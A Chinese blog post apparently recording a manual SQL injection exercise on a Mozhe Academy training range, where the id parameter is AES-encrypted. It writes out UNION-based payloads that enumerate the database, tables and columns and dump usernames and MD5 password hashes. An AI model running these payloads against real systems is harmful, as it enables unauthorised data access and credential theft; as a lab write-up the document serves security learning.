记一次墨者学院靶场手工注入

该博客记录了对WEB业务系统的SQL注入测试过程。通过SQL注入获取账号密码登录,因数据做了AES加密需找秘钥和偏移量。经尝试在通知栏找到注入点,获取数据库名、表名、字段及信息数据,密码为MD5加密。总结指出加密不能根本解决SQL注入问题。

环境信息:

环境是这样的,通过SQL注入方式,获取WEB业务系统的账号密码进行登录。

web业务数据做了AES加密,需要找到AES加密秘钥和偏移量才能进行解密。

环境地址:

http://219.XXX.XXX.228:49408/

测试过程:

访问页面如图:

尝试账号密码登录进行注入,均返回账号或密码错误,注入点不在账号密码处,只能找其他地方。

登录一栏下面有一则通知栏,点击进去,感觉值为AES加密:

http://219.XXX.XXX.228:49408/news/list.php?id=ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09

历经千辛万苦终于找到一个文件找到了AES的加密算法:

解密ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09,解密:结果为1_mozhe。

1 and 1=2_mozhe加密之后访问,页面报错,终于找到注入点了。

1 order by 4_mozhe,测试有4个字段(字符型需要加':1' order by 4 --+)

1 union select 1,database(),version(),4_mozhe 查看数据库名和版本信息

-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()_mozhe  获取表名

-1  union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='XXXXX'_mozhe  获取字段

-1  union select 1,group_concat(name,0x3a,password),3,4 from XXXX_mozhe  获取信息数据

得到账号密码,密码为MD5加密。

总结

加密不能从根本上解决SQL注入的问题。很久没进行手注了,都忘记语法了,正好复习一下。

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值